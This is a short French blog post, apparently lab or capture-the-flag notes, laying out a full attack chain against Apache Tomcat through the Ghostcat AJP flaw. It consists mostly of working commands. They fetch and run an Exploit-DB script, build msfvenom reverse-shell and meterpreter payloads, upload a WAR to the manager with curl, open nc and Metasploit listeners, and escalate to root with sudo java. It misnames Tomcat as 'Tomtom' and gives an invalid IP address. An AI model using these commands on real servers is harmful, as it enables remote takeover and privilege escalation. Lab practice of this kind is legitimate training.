Hack tomcat

Il existe une vulnérabilité dans Tomtom et le service AJP (ghostcat). Ce service est un protocole différent pour accéder à l’interface administrateur.


wget https://www.exploit-db.com/download/48143

python2 48143.py  10.10.151.49 #on retrouve un utilisateur et mot de passe. 

msfvenom -p java/shell_reverse_tcp lhost=10.9.0.60 lport=4444 -f war -o pwn.war

curl -u user_found --upload-file pwn.war http://10.10.151.49:8080/manager/text/deploy?path=/shell  #il y a aussi la possibilité d'uploader avec l'interface html

nc -nlvp 4444

On peut maintenant accéder à http://10.10.511.49/shell

Par la suite, on peut trouver un exploit pour obtenir le compte d’un utilisateur. Par exemple, si on peut exécuter java comme “root”

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.9.0.60 LPORT=4445 -f raw -o /tmp/revmet.jar
msfconsole
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.9.0.60
set LPORT 4445
set ExitOnSession false
exploit -j -z

et puis dans le shell sur l’ordinateur de la victime : sudo java -jar revmet.jar

Leave a Reply